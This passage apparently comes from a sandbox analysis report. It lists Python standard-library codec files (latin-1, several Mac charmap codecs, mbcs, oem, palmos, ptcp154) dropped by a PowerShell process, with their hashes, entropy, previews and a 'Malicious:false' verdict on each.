                                                                                                                                                                                                                      Preview:""" Python 'latin-1' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.latin_1_encode.. decode = codecs.latin_1_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.latin_1_encode(input,self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.latin_1_decode(input,self.errors)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....class StreamConverter(StreamWriter,StreamReader):.... encode = codecs.latin_1_decode.. decode = codecs.latin_1_encode....### encodings module API..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):37165
                                                                                                                                                                                                                      Entropy (8bit):4.736863402692657
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:RakostECDXJVf+hiOjiU6Q3DBEQ12yWQZr75CAwKC1/h:Ukost5LX2htjN6QT682PQx5PwVJ
                                                                                                                                                                                                                      MD5:C269925332C46C7A774FBFCAD74F4B66
                                                                                                                                                                                                                      SHA1:5F9542A16C83A7EE831F320507BD87756B398DCF
                                                                                                                                                                                                                      SHA-256:F5C262F930F3B7D83466283347F8B0D7B5C7CBF18DD6FCEB4FAF93DBCD58839E
                                                                                                                                                                                                                      SHA-512:5BAE57045F650E062EAEA05106F726A0C9B29409CA6CD9667338473DF8CA779BE8965C5F8BD5D87B2DDB76024794AFFC92FF98850D0D0161269133AC3B2F7825
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'VENDORS/APPLE/ARABIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-arabic',.. encode=Codec().encode,
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13940
                                                                                                                                                                                                                      Entropy (8bit):4.577897629122807
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:wHhsuOTDvRI7ZpouhIAs2+iy2w4kN8gzeqBwHr+:tTZuhIAl+4E16ap
                                                                                                                                                                                                                      MD5:C3FC8C5389BFDF1371B849C38FE1A20C
                                                                                                                                                                                                                      SHA1:009654FD007C938E2FC889B64954FD139EE051E8
                                                                                                                                                                                                                      SHA-256:68539CA54FFD5D96C07F3590E720D8A28009CB7CAA13E607AC3084D19DD5A19A
                                                                                                                                                                                                                      SHA-512:8F81FD2106ED43E0CE34004576ED99D77FB6766EC6B757EB4F8B815742E86F90C36CDBAF19E9C3BE3D4F2B92B94695D014721C4A2D7E22312155BE7FBA1164BA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_croatian generated from 'MAPPINGS/VENDORS/APPLE/CROATIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-croatian',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13761
                                                                                                                                                                                                                      Entropy (8bit):4.613646718299373
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:8HhsuOTDvRA7ZpouhIAs2+i4Xm8jLPeqBap+f:pTduhIAl+mmia1f
                                                                                                                                                                                                                      MD5:69AF178D83304D0AB6260D64CC9C734F
                                                                                                                                                                                                                      SHA1:AA73ADF92F5762F559B26C9858590AA750D4F25F
                                                                                                                                                                                                                      SHA-256:AC11E1F54789AFF782D79FE7D6FD52183EF0F57B6AC4A0F680353FE0113F0D4D
                                                                                                                                                                                                                      SHA-512:A42B7C7CD5E6AE157B1DCE131264C353DF0FF6FEA09B06D1498EF07931D94D91C48D311964E0F35D4DF893CE65BFD5F3339BB9E1541DFBE2A2FEED25A478E9F9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_cyrillic generated from 'MAPPINGS/VENDORS/APPLE/CYRILLIC.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-cyrillic',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):15477
                                                                                                                                                                                                                      Entropy (8bit):4.803106966743048
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:4HhsuOTDvRe7Zt+/UxcXwz1BhFouhCuMQ+iujx5zCdxeiu5iEpkHzWO0yfZBcsWR:FTPuhCuj6fHmHzp03
                                                                                                                                                                                                                      MD5:46E0758A4DF808F2649BD6B7262362BA
                                                                                                                                                                                                                      SHA1:A647995DAE668E9D2EDF34529CF1DDDD06AC8016
                                                                                                                                                                                                                      SHA-256:B0F1FA8399AD1844EF5F07ACFCD523585AB576F411D845A008A610FF6A25AD31
                                                                                                                                                                                                                      SHA-512:ABB217D00013E01B89855773B9CA728F2F0D14C9E3A7F4CC705588D458CB06E93A6FC187F87FD084F78E0668094324F9D0857D58CFC68D04A8883C8973BB6A77
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_farsi generated from 'MAPPINGS/VENDORS/APPLE/FARSI.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-farsi',.. e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14028
                                                                                                                                                                                                                      Entropy (8bit):4.6264619578502515
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:WlHhsuOTDvRT7ZpouhIAs2+iEh+GsHlIu/lwqBxTj/Fq3FHEj:rTCuhIAl6+GeJ/Wa3QVQ
                                                                                                                                                                                                                      MD5:338143EC1BC5F5DDE251657BECC4667A
                                                                                                                                                                                                                      SHA1:E68BFEAB6E5209748AC47B44505E6CA581141647
                                                                                                                                                                                                                      SHA-256:4C67D361F922B611213FD8FEB9FCAAA9FF8CB57CD961F1CA1B5CF4483B1DEE66
                                                                                                                                                                                                                      SHA-512:D58D0F6309FCF945FF25F7B5D825E8BAB1BFBDB40490110ADBA51B587AED5BE101A22C22CA99B9A4FF9B355F8E7980A713EA6CDD550403B37915EB79796E8A39
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_greek generated from 'MAPPINGS/VENDORS/APPLE/GREEK.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-greek',.. e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13805
                                                                                                                                                                                                                      Entropy (8bit):4.569004919357403
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:+HhsuOTDvRB7ZpouhIAs2+iy2wkKY2gKPeqBamec6U6+8:LTcuhIAl+k3LFam
                                                                                                                                                                                                                      MD5:8FF7EE70CFFA2B336AEE3367796C96ED
                                                                                                                                                                                                                      SHA1:1F26D1C59F9A124AD334FB2BB3FC1E3D605587FA
                                                                                                                                                                                                                      SHA-256:64DE55FD0EA0FE4D2512B2303DCB3D20CC57061D78D08A11D3AA6F19E1877826
                                                                                                                                                                                                                      SHA-512:6D0A64EBFA6F29FD5317043F9C08D0D1F68A39B6640615B2EF093C99629479CE8562C29AEA6509E2FEB255BFE93D0E9FCE9FB1DB43F86F17FE366ADC2788FC7F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_iceland generated from 'MAPPINGS/VENDORS/APPLE/ICELAND.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-iceland',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14430
                                                                                                                                                                                                                      Entropy (8bit):4.621572363853459
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:S3hsuOTDvRNUrXPLouhIAs2+iDK19L4vJPeqB48:hTnuhIAlmP4EaD
                                                                                                                                                                                                                      MD5:BAF2B9E09D011F78EA36ED2CC5ED22FD
                                                                                                                                                                                                                      SHA1:77B62918E1FAFD837EEE086C552265384BB506B4
                                                                                                                                                                                                                      SHA-256:74C9045009FABFFA3E81B5B41D97A85860BA42D109DB6673A276EA8BA9B59E56
                                                                                                                                                                                                                      SHA-512:5FB69F8A5FB424B7872B3872CB75B3B538A35533BFE8F8AFFEC44D82B372C866D1841B2568680ACB954CEB696A92EE3091DC06F04EA89DB5651F35F5667B6DA1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_latin2 generated from 'MAPPINGS/VENDORS/MICSFT/MAC/LATIN2.TXT' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(C
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13787
                                                                                                                                                                                                                      Entropy (8bit):4.580644681215749
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:wHhsuOTDvR27ZpouhIAs2+iy2w4KY2gKPeqBaoG5:tT/uhIAl+43LFaW
                                                                                                                                                                                                                      MD5:1F99EDC6D4A3BA200295364C52D6038D
                                                                                                                                                                                                                      SHA1:8FD1FF1EEC2F74907935621572360E7E53FE7038
                                                                                                                                                                                                                      SHA-256:6BF6FDE10F2350232DE5EE47D27CAE885362602443B59A924DE8EB6998B18BB2
                                                                                                                                                                                                                      SHA-512:2924BFF1C570128D57711F91CE1A87B5D156A24144FA3FEBDDDF6C9BB7B82570FB1F9B9FB1C5D23CD9625BF5568F42B718DB3A432F35B47DFF9E72FAE199EA56
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_roman generated from 'MAPPINGS/VENDORS/APPLE/ROMAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-roman',.. e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13968
                                                                                                                                                                                                                      Entropy (8bit):4.599704767840293
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:FqHhsuOTDvR+7ZpouhIAs2+iy2w4kyYpDgKPeqBaj5:FHTvuhIAl+4cqFaI
                                                                                                                                                                                                                      MD5:425337635E74A8B98CD770F43848AF18
                                                                                                                                                                                                                      SHA1:C0F5A92D564177C49E76471117E4B521FD52DF17
                                                                                                                                                                                                                      SHA-256:1DE13F2703A62479C4312F9A39514C7691CF7F737958B3915AF395A53A596183
                                                                                                                                                                                                                      SHA-512:853EC8BEB168F69C36AEA83AE221AEADE920DD293928B6F9F61F8938955DF3C709169424D93F49EE05CE2C1AD487CE925808CB136CA91C5022BAD6404008AF6A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_romanian generated from 'MAPPINGS/VENDORS/APPLE/ROMANIAN.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-romanian',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13820
                                                                                                                                                                                                                      Entropy (8bit):4.579994522132136
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:yHhsuOTDvRT7ZpouhIAs2+iy2w4KY2gKPeqB9NGc:/TquhIAl+43LFal
                                                                                                                                                                                                                      MD5:1C214A3F28D2D23CC7FDED7A387585A0
                                                                                                                                                                                                                      SHA1:B40E5DA5FD44499B161BD2649A6258C9A968D5D5
                                                                                                                                                                                                                      SHA-256:E7F9E6C9F92513C69754AEF1D7AB235B09E9EEADBBCED4C86DF6E2AA2D06A1EF
                                                                                                                                                                                                                      SHA-512:58C6B56938D709AFC4E756C2F0CC40812724B963B118CE5E1CA84798DFD17F9E324AC8F5B68FA84FE883E91CBEA8E7FC4BBE32EAE175F1B55072FAAFA7F7397A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec mac_turkish generated from 'MAPPINGS/VENDORS/APPLE/TURKISH.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='mac-turkish',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1258
                                                                                                                                                                                                                      Entropy (8bit):4.753222127608113
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JwEFOXxVaniSdZSHvcGWQvnNq1I5atMufnb+s0ktzE9ZKj94JxFplR:JwEWxVaniSvIvdvNq1I5aCuzbztzETK2
                                                                                                                                                                                                                      MD5:0D4DEB48618561417DDE714ACF399AA3
                                                                                                                                                                                                                      SHA1:F617D8FC1B17AEC713947CDEE9BA302B4B2E71B1
                                                                                                                                                                                                                      SHA-256:B00887A6D93C97D320CBB1C3379BD7C6DE767CCFC34ED13442891E06CC62F148
                                                                                                                                                                                                                      SHA-512:722C9182DEAF8A8A65550EF86F967A559105BE6EB61C9FB3244521D51649B8A2B901E911A28FBB0CC42F1E680ACD0FC64B475E53DEE921287010EE112D982630
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'mbcs' Codec for Windows......Cloned by Mark Hammond (mhammond@skippinet.com.au) from ascii.py,..which was written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import mbcs_encode, mbcs_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = mbcs_encode....def decode(input, errors='strict'):.. return mbcs_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return mbcs_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = mbcs_decode....class StreamWriter(codecs.StreamWriter):.. encode = mbcs_encode....class StreamReader(codecs.StreamReader):.. decode = mbcs_decode....### encodings module API....def getregentry():.. return codecs
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1060
                                                                                                                                                                                                                      Entropy (8bit):4.538507695911449
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JkZSHvcGW6pjvneEq1IhhatMufko3b+00kwWzu9ZKj9wJxFplR:JSIvvBvPq1IhhaCu8M1zPzuTKiJxTz
                                                                                                                                                                                                                      MD5:5163EF7B87B6DEE11BC7914E2AB1FF8E
                                                                                                                                                                                                                      SHA1:92EB877FD4F77A40FC6745717139D4E335670613
                                                                                                                                                                                                                      SHA-256:991D1FD2F4B815943EAE7F7BFA9F87E2DE980ACB08932BEA3258FB034902A15F
                                                                                                                                                                                                                      SHA-512:99458C11DB86287A818176588DEBD76AD18401557B7D49F01FCFA85C917947CDADC310DEF539434824997922CB24005853751920EAE103B0DB04A83AB3A49E46
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'oem' Codec for Windows...."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import oem_encode, oem_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = oem_encode....def decode(input, errors='strict'):.. return oem_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return oem_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = oem_decode....class StreamWriter(codecs.StreamWriter):.. encode = oem_encode....class StreamReader(codecs.StreamReader):.. decode = oem_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='oem',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreade
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13827
                                                                                                                                                                                                                      Entropy (8bit):4.583791210166393
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:7hsuOTDvR1UrXPLouhIAs2+iXIcDCYBZt6CJTd12:mTDuhIAlX9Zt680
                                                                                                                                                                                                                      MD5:3D512E1AB4D97E95DCEE526F991E685F
                                                                                                                                                                                                                      SHA1:0349C9649CC54002699DD48E80DA09DDC21F9432
                                                                                                                                                                                                                      SHA-256:C9E5D71C1FA128602E2D10E9BED0B271132DF349290F4465CFCA9D5DAA5BA86C
                                                                                                                                                                                                                      SHA-512:DB6CE7BF928D829175D54328A6A37F1A8B691B04CEF1C76CE0C98B6B2C21959DF7BCA822416BFF39C2530E93F8B15CCB55E480FD1187C6258734923A10CF9878
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec for PalmOS 3.5.....Written by Sjoerd Mullender (sjoerd@acm.org); based on iso8859_15.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='palmos',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14327
                                                                                                                                                                                                                      Entropy (8bit):4.653952382312946
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:63hsuOTDvRmUrXPLouhIAs2+iRQCzJHDCYbtlqtEDp+/:ZTsuhIAlXzJHftlqtEo/
                                                                                                                                                                                                                      MD5:6EE7970BA64A9E17B3246A28C7CECD28
                                                                                                                                                                                                                      SHA1:6B56118465C3E53A7E6C0BECE694E3643B485FC0
                                                                                                                                                                                                                      SHA-256:F3BDA3C1415D37DD1C314E3F474529913F36F7021279D82DED0D11154EED55F2
                                                                                                                                                                                                                      SHA-512:FAA196E1B4CCEEB771F9EC19E528696B35EAD5AC6CF1EF53DA092F75DB701FB59DBBA7FACEF3F169BC4D6DBF9336D250E0F4B9DFEE9EF2DCAD32C0FAD31C8A93
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'PTCP154.txt' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
